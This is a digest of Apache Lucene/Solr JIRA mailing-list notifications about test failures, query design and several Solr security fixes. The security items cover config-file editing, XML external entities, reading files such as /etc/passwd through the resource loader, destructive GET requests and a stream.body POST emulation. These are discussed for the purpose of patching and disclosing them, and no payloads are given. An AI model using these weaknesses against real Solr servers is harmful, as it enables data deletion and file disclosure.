https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836608#comment-13836608
 ] 

Erick Erickson commented on SOLR-5488:
--

[~sbower]

Here's the most recent failure, this link still works; it's the same pattern:
http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8534/consoleFull

Here's the log output, it's not all that helpful though I don't think, it just 
shows that there are nulls in the sections returned. There's no exception being 
thrown by the analytics code, it's happily putting nulls in sometimes, e.g. 
.

[junit4] Suite: org.apache.solr.analytics.expression.ExpressionTest
   [junit4]   2> 133086 T539 oas.SolrTestCaseJ4.initCore initCore
   [junit4]   2> Creating dataDir: 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test/J0/./solrtest-ExpressionTest-1385918695507
   [junit4]   2> 133087 T539 oasc.SolrResourceLoader. new 
SolrResourceLoader for directory: 
'/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/collection1/'
   [junit4]   2> 133087 T539 oasc.SolrResourceLoader.replaceClassLoader Adding 
'file:/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/collection1/lib/classes/'
 to classloader
   [junit4]   2> 133088 T539 oasc.SolrResourceLoader.replaceClassLoader Adding 
'file:/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/collection1/lib/README'
 to classloader
   [junit4]   2> 133125 T539 oasc.SolrConfig. Using Lucene MatchVersion: 
LUCENE_50
   [junit4]   2> 133160 T539 oasc.SolrConfig. Loaded SolrConfig: 
solrconfig-basic.xml
   [junit4]   2> 133161 T539 oass.IndexSchema.readSchema Reading Solr Schema 
from schema-analytics.xml
   [junit4]   2> 133165 T539 oass.IndexSchema.readSchema [null] Schema 
name=schema-docValues
   [junit4]   2> 133201 T539 oass.IndexSchema.readSchema unique key field: id
   [junit4]   2> 133203 T539 oasc.SolrResourceLoader.locateSolrHome JNDI not 
configured for solr (NoInitialContextEx)
   [junit4]   2> 133203 T539 oasc.SolrResourceLoader.locateSolrHome using 
system property solr.solr.home: 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr
   [junit4]   2> 133203 T539 oasc.SolrResourceLoader. new 
SolrResourceLoader for directory: 
'/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/'
   [junit4]   2> 133211 T539 oasc.SolrResourceLoader.locateSolrHome JNDI not 
configured for solr (NoInitialContextEx)
   [junit4]   2> 133211 T539 oasc.SolrResourceLoader.locateSolrHome using 
system property solr.solr.home: 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr
   [junit4]   2> 133212 T539 oasc.SolrResourceLoader. new 
SolrResourceLoader for deduced Solr Home: 
'/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/'
   [junit4]   2> 133251 T539 oasc.CoreContainer. New CoreContainer 
1424968760
   [junit4]   2> 133251 T539 oasc.CoreContainer.load Loading cores into 
CoreContainer 
[instanceDir=/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/]
   [junit4]   2> 133252 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
socketTimeout to: 0
   [junit4]   2> 133253 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
urlScheme to: http://
   [junit4]   2> 133253 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
connTimeout to: 0
   [junit4]   2> 133253 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
maxConnectionsPerHost to: 20
   [junit4]   2> 133254 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
corePoolSize to: 0
   [junit4]   2> 133254 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
maximumPoolSize to: 2147483647
   [junit4]   2> 133254 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
maxThreadIdleTime to: 5
   [junit4]   2> 133255 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
sizeOfQueue to: -1
   [junit4]   2> 133255 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
fairnessPolicy to: false
   [junit4]   2> 133260 T539 oasl.LogWatcher.createWatcher SLF4J impl is 
org.slf4j.impl.Log4jLoggerFactory
   [junit4]   2> 133260 T539 oasl.LogWatcher.newRegisteredLogWatcher 
Registering Log Listener [Log4j (org.slf4j.impl.Log4jLoggerFactory)]
   [junit4]   2> 133261 T539 oasc.CoreContainer.load Host Name: 
   [junit4]   2> 133264 T540 oasc.CoreContainer.create Creating SolrCore 
'collection1' using instanceDir: 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/collection1
   [junit4]   2> 133265 T540 oasc.SolrResourceLoader. new 
SolrResourceLoader for directory: 
'/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/collection1/'
   [junit4]   2> 133265 T540 oasc.SolrResour

[jira] [Commented] (LUCENE-2395) Add a scoring DistanceQuery that does not need caches and separate filters

2013-12-02 Thread David Smiley (JIRA)


[ 
https://issues.apache.org/jira/browse/LUCENE-2395?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836593#comment-13836593
 ] 

David Smiley commented on LUCENE-2395:
--

These issues are unrelated.  The expressions module, I believe, allows 
convenient ways to reference numbers in DocValues/FieldCache together with 
various functions (usually mathematical) for Sorting or relevancy.  But that is 
expressly excluded from the issue title "does not need caches".  That's a 
worthwhile goal for some use-cases -- no cache means more NRT friendly.  
Furthermore, AFAIK the Lucene expressions module is limited to single-valued 
fields whereas an approach along the lines described in this issue, such as in 
my last comment specifically, would support multi-valued spatial fields because 
it decodes the actual terms during its execution and can thus reference the 
same doc from multiple terms/points.

> Add a scoring DistanceQuery that does not need caches and separate filters
> --
>
> Key: LUCENE-2395
> URL: https://issues.apache.org/jira/browse/LUCENE-2395
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/spatial
>Reporter: Uwe Schindler
> Attachments: ASF.LICENSE.NOT.GRANTED--DistanceQuery.java, 
> ASF.LICENSE.NOT.GRANTED--DistanceQuery.java
>
>
> In a chat with Chris Male and my own ideas when implementing for PANGAEA, I 
> thought about the broken distance query in contrib. It lacks the following 
> features:
> - It needs a query/filter for the enclosing bbox (which is constant score)
> - It needs a separate filter for filtering out hits to far away (inside bbox 
> but outside distance limit)
> - It has no scoring, so if somebody wants to sort by distance, he needs to 
> use the custom sort. For that to work, spatial caches distance calculation 
> (which is broken for multi-segment search)
> The idea is now to combine all three things into one query, but customizeable:
> We first thought about extending CustomScoreQuery and calculate the distance 
> from FieldCache in the customScore method and return a score of 1 for 
> distance=0, score=0 on the max distance and score<0 for farer hits, that are 
> in the bounding box but not in the distance circle. To filter out such 
> negative scores, we would need to override the scorer in CustomScoreQuery 
> which is priate.
> My proposal is now to use a very stripped down CustomScoreQuery (but not 
> extend it) that does call a method getDistance(docId) in its scorer's advance 
> and nextDoc that calculates the distance for the current doc. It stores this 
> distance also in the scorer. If the distance > maxDistance it throws away the 
> hit and calls nextDoc() again. The score() method will reurn per default 
> weight.value*(maxDistance - distance)/maxDistance and uses the precalculated 
> distance. So the distance is only calculated one time in nextDoc()/advance().
> To be able to plug in custom scoring, the following methods in the query can 
> be overridden:
> - float getDistanceScore(double distance) - returns per default: (maxDistance 
> - distance)/maxDistance; allows score customization
> - DocIdSet getBoundingBoxDocIdSet(Reader, LatLng sw, LatLng ne) - returns an 
> DocIdSet for the bounding box. Per default it returns e.g. the docIdSet of a 
> NRF or a cartesian tier filter. You can even plug in any other DocIdSet, e.g. 
> wrap a Query with QueryWrapperFilter
> - support a setter for the GeoDistanceCalculator that is used by the scorer 
> to get the distance.
> - a LatLng provider (similar to CustomScoreProvider/ValueSource) that returns 
> for a given doc id the lat/lng. This method is called per IndexReader one 
> time in scorer creation and will retrieve the coordinates. By that we support 
> FieldCache or whatever.
> This query is almost finished in my head, it just needs coding :-)



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Steve Rowe (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836586#comment-13836586
 ] 

Steve Rowe commented on SOLR-5287:
--

{quote}
bq. BTW, I take it this doesn't apply to the REST API for manipulating the 
schema?
It should not apply, because this does not support uploading arbitrary files or 
modifying plain XML that can get exploited with xinclude/external entities. The 
schema modification APIs hopefully only allow "semantic changes" to the schema, 
but does not allow to upload XML snippets to be included in those files without 
checks. I think Steve Rowe can comment on this, thanks for the pointer!
{quote}

At present, only JSON is supported in the Schema REST API methods that accept 
PUT or POST requests, so xinclude/external entities aren't possible.  External 
files can be pointed to, though, for classes that use them, e.g. analysis 
components.

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Steven Bower (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836584#comment-13836584
 ] 

Steven Bower commented on SOLR-5488:


Per your comment on the original issue.. lets just move forward with 4x.. more 
people using it will lead to more issues found..

> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Steven Bower (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836583#comment-13836583
 ] 

Steven Bower commented on SOLR-5488:


I think we should try to get it fixed on trunk then merge.. I don't mind doing 
the merge... Do you have a list of the currently failing issues?

That being said I'd love to get this in 4.x (it would make my life easier as I 
wouldn't have to keep my copy in my local source control along with keeping 
this version up-to-date..

> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Resolved] (SOLR-1698) load balanced distributed search

2013-12-02 Thread Shalin Shekhar Mangar (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-1698?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Shalin Shekhar Mangar resolved SOLR-1698.
-

   Resolution: Fixed
Fix Version/s: 4.0-ALPHA

This has been incorporated in SolrCloud.

> load balanced distributed search
> 
>
> Key: SOLR-1698
> URL: https://issues.apache.org/jira/browse/SOLR-1698
> Project: Solr
>  Issue Type: Improvement
>Reporter: Yonik Seeley
> Fix For: 4.0-ALPHA
>
> Attachments: SOLR-1698.patch, SOLR-1698.patch, SOLR-1698.patch, 
> SOLR-1698.patch, SOLR-1698.patch
>
>
> Provide syntax and implementation of load-balancing across shard replicas.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Closed] (SOLR-1698) load balanced distributed search

2013-12-02 Thread Shalin Shekhar Mangar (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-1698?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Shalin Shekhar Mangar closed SOLR-1698.
---


> load balanced distributed search
> 
>
> Key: SOLR-1698
> URL: https://issues.apache.org/jira/browse/SOLR-1698
> Project: Solr
>  Issue Type: Improvement
>Reporter: Yonik Seeley
> Fix For: 4.0-ALPHA
>
> Attachments: SOLR-1698.patch, SOLR-1698.patch, SOLR-1698.patch, 
> SOLR-1698.patch, SOLR-1698.patch
>
>
> Provide syntax and implementation of load-balancing across shard replicas.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (LUCENE-5354) Blended score in AnalyzingInfixSuggester

2013-12-02 Thread Michael McCandless (JIRA)


[ 
https://issues.apache.org/jira/browse/LUCENE-5354?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836569#comment-13836569
 ] 

Michael McCandless commented on LUCENE-5354:


This sounds very useful!

I think a subclass could work well, if we open up the necessary methods (which 
Query to run, how to do the search / resort the results)?

We could make the index-time sorting optional as well?  This way you'd build an 
"ordinary" index, run an "ordinary" query, so you have full flexibility (but at 
more search-time cost).

> Blended score in AnalyzingInfixSuggester
> 
>
> Key: LUCENE-5354
> URL: https://issues.apache.org/jira/browse/LUCENE-5354
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/spellchecker
>Affects Versions: 4.4
>Reporter: Remi Melisson
>Priority: Minor
>  Labels: suggester
>
> I'm working on a custom suggester derived from the AnalyzingInfix. I require 
> what is called a "blended score" (//TODO ln.399 in AnalyzingInfixSuggester) 
> to transform the suggestion weights depending on the position of the searched 
> term(s) in the text.
> Right now, I'm using an easy solution :
> If I want 10 suggestions, then I search against the current ordered index for 
> the 100 first results and transform the weight :
> bq. a) by using the term position in the text (found with TermVector and 
> DocsAndPositionsEnum)
> or
> bq. b) by multiplying the weight by the score of a SpanQuery that I add when 
> searching
> and return the updated 10 most weighted suggestions.
> Since we usually don't need to suggest so many things, the bigger search + 
> rescoring overhead is not so significant but I agree that this is not the 
> most elegant solution.
> We could include this factor (here the position of the term) directly into 
> the index.
> So, I can contribute to this if you think it's worth adding it.
> Do you think I should tweak AnalyzingInfixSuggester, subclass it or create a 
> dedicated class ?



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5302) Analytics Component

2013-12-02 Thread Erick Erickson (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5302?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836570#comment-13836570
 ] 

Erick Erickson commented on SOLR-5302:
--

I have a time constraint here. See comments for SOLR-5488. The short form is I 
have to be done with this no later than tomorrow (Tuesday) night. I've outlined 
several options at SOLR-5488, let me know what people think the best thing to 
do is. Please comment on SOLR-5488.


> Analytics Component
> ---
>
> Key: SOLR-5302
> URL: https://issues.apache.org/jira/browse/SOLR-5302
> Project: Solr
>  Issue Type: New Feature
>Reporter: Steven Bower
>Assignee: Erick Erickson
> Attachments: SOLR-5302.patch, SOLR-5302.patch, SOLR-5302.patch, 
> SOLR-5302.patch, Search Analytics Component.pdf, Statistical Expressions.pdf, 
> solr_analytics-2013.10.04-2.patch
>
>
> This ticket is to track a "replacement" for the StatsComponent. The 
> AnalyticsComponent supports the following features:
> * All functionality of StatsComponent (SOLR-4499)
> * Field Faceting (SOLR-3435)
> ** Support for limit
> ** Sorting (bucket name or any stat in the bucket
> ** Support for offset
> * Range Faceting
> ** Supports all options of standard range faceting
> * Query Faceting (SOLR-2925)
> * Ability to use overall/field facet statistics as input to range/query 
> faceting (ie calc min/max date and then facet over that range
> * Support for more complex aggregate/mapping operations (SOLR-1622)
> ** Aggregations: min, max, sum, sum-of-square, count, missing, stddev, mean, 
> median, percentiles
> ** Operations: negation, abs, add, multiply, divide, power, log, date math, 
> string reversal, string concat
> ** Easily pluggable framework to add additional operations
> * New / cleaner output format
> Outstanding Issues:
> * Multi-value field support for stats (supported for faceting)
> * Multi-shard support (may not be possible for some operations, eg median)



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Steven Bower (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836560#comment-13836560
 ] 

Steven Bower commented on SOLR-5488:


That link to jenkins doesn't work for me.. do you have another link or list of 
tests that failed?

> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Erick Erickson (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836566#comment-13836566
 ] 

Erick Erickson commented on SOLR-5488:
--

I can do one of several things:
1> Put the fix for the remaining test issue in tomorrow (Tuesday) night and 
merge into 4x. Someone needs to supply it :) [~sbower] [~houstonputman] what do 
you think?
or
2> just merge the current code into 4x and have someone apply the fix in both 
places.
or
3> pass it off to someone else for the foreseeable future.
or
4> just skip it for 4x and call it a 5x feature.

The current state is this is in trunk, but not 4x and it's failing tests 
occasionally. But otherwise things seem fine.

Let me know what people think. This is a significant new feature I don't want 
it to languish.


Here's a list of the merges. I've been trying to keep up with them, I have a 
local copy with all of them applied, precommit and tests all succeed. I had to 
do some minor reconciliations along the way.

svn merge -c 1543651 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545009 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545053 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545054 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545080 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545143 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545417 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545514 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1545650 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1546074 https://svn.apache.org/repos/asf/lucene/dev/trunk
svn merge -c 1546263 https://svn.apache.org/repos/asf/lucene/dev/trunk



> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread Stefan Matheis (steffkes) (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836552#comment-13836552
 ] 

Stefan Matheis (steffkes) commented on SOLR-5518:
-

I'm not sure if there's a need to remove the "Files" Page completely, since 
browsing the available files would be possible w/o the write-stuff anyway? 
maybe just removing the "modify" functionality but leave the rest "as is"?

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way 5287 is a 
> security vulnerability and that disabling it should be the norm. Subsequent 
> discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1698) load balanced distributed search

2013-12-02 Thread JIRA


[ 
https://issues.apache.org/jira/browse/SOLR-1698?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836545#comment-13836545
 ] 

Jan Høydahl commented on SOLR-1698:
---

I think this issue could be closed?

> load balanced distributed search
> 
>
> Key: SOLR-1698
> URL: https://issues.apache.org/jira/browse/SOLR-1698
> Project: Solr
>  Issue Type: Improvement
>Reporter: Yonik Seeley
> Attachments: SOLR-1698.patch, SOLR-1698.patch, SOLR-1698.patch, 
> SOLR-1698.patch, SOLR-1698.patch
>
>
> Provide syntax and implementation of load-balancing across shard replicas.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Updated] (SOLR-4882) Restrict SolrResourceLoader to only classloader accessible files and instance dir

2013-12-02 Thread Uwe Schindler (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-4882?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-4882:


Labels: security  (was: )

> Restrict SolrResourceLoader to only classloader accessible files and instance 
> dir
> -
>
> Key: SOLR-4882
> URL: https://issues.apache.org/jira/browse/SOLR-4882
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 4.3
>Reporter: Uwe Schindler
>Assignee: Uwe Schindler
>  Labels: security
> Fix For: 4.6, 5.0
>
> Attachments: SOLR-4882.patch, SOLR-4882.patch, SOLR-4882.patch
>
>
> SolrResourceLoader currently allows to load files from any 
> absolute/CWD-relative path, which is used as a fallback if the resource 
> cannot be looked up via the class loader.
> We should limit this fallback to sub-dirs below the instanceDir passed into 
> the ctor. The CWD special case should be removed, too (the virtual CWD is 
> instance's config or root dir).
> The reason for this is security related. Some Solr components allow to pass 
> in resource paths via REST parameters (e.g. XSL stylesheets, velocity 
> templates,...) and load them via resource loader. By this it is possible to 
> limit the whole thing to
> not allow loading e.g. /etc/passwd as a stylesheet.
> In 4.4 we should add a solrconfig.xml setting to enable the old behaviour, 
> but disable it by default, if your existing installation requires the files 
> from outside the instance dir which are not available via the URLClassLoader 
> used internally. In Lucene 5.0 we should not support this anymore.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Updated] (SOLR-5520) Backport some security fixes from 4.x to 3.6.x branch

2013-12-02 Thread Uwe Schindler (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-5520?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-5520:


Labels: security  (was: )

> Backport some security fixes from 4.x to 3.6.x branch
> -
>
> Key: SOLR-5520
> URL: https://issues.apache.org/jira/browse/SOLR-5520
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 3.6.2
>Reporter: Uwe Schindler
>Assignee: Uwe Schindler
>  Labels: security
> Fix For: 3.6.3
>
> Attachments: SOLR-4481-3895-36.patch, SOLR-4882-36.patch
>
>
> Redhat wants to backport some security fixes we applied in 4.1 and 4.6 to the 
> Solr tree to 3.6, because their user-base still uses this version. To help 
> them with backporting across the major API/version changes, we should also do 
> this on the 3.6 branch.
> Redhat already assigned 3 CVE numbers to these issues and take the older 
> issues seriously, and they will patch older versions and also force users to 
> upgrade. cf, 
> [CVE-2013-6397|https://access.redhat.com/security/cve/CVE-2013-6397] 
> (SOLR-4882), 
> [CVE-2013-6407|https://access.redhat.com/security/cve/CVE-2013-6407] 
> (SOLR-3895), 
> [CVE-2013-6408|https://access.redhat.com/security/cve/CVE-2013-6408] 
> (SOLR-4881).
> To fully fix, we might need to backport more patches. I will take care of 
> this. This issue may be useful, if we release a 3.6.3 package.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Comment Edited] (SOLR-1523) Destructive Solr operations accept HTTP GET requests

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1523?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836519#comment-13836519
 ] 

Uwe Schindler edited comment on SOLR-1523 at 12/2/13 2:12 PM:
--

This is my favourite: http://www.thetaphi.de/nukeyoursolrindex.html

bq. Another dangerous default is the solrconfig.xml  parameter 
enableRemoteStreaming="true" which should pershaps default to false from 4.7 or 
5.0. It allows anyone to delete everything with a single GET...

This also works without remote streaming, a single {{stream.body=...}} 
parameter can emulate any POST request. See my report about the edit file admin 
handler from yesterday: 
[https://issues.apache.org/jira/browse/SOLR-5287?focusedCommentId=13836061&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-13836061]


was (Author: thetaphi):
This is my favourite: http://www.thetaphi.de/nukeyoursolrindex.html

bq. Another dangerous default is the solrconfig.xml  parameter 
enableRemoteStreaming="true" which should pershaps default to false from 4.7 or 
5.0. It allows anyone to delete everything with a single GET...

This also works without remote streaming, a single {{stream.body=...}} 
parameter can emulate any POST request. See my report about the edit file admin 
handler from yesterday.

> Destructive Solr operations accept HTTP GET requests 
> -
>
> Key: SOLR-1523
> URL: https://issues.apache.org/jira/browse/SOLR-1523
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 1.4, 3.6.2, 4.6
>Reporter: Lance Norskog
>  Labels: security
>
> GET v.s. POST/PUT/DELETE
> The multicore implementation allows HTTP GET requests to perform system 
> administration commands. This means that an URL which alters the system can 
> be bookmarked/e-mailed/etc. This is dangerous in a production system.
> A clean implementation should give every request handler the ability to 
> accept some HTTP verbs and reject others. It could be just a boolean for 
> whether it accepts a GET, or the interface might actually have a list of 
> verbs it accepts. 



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

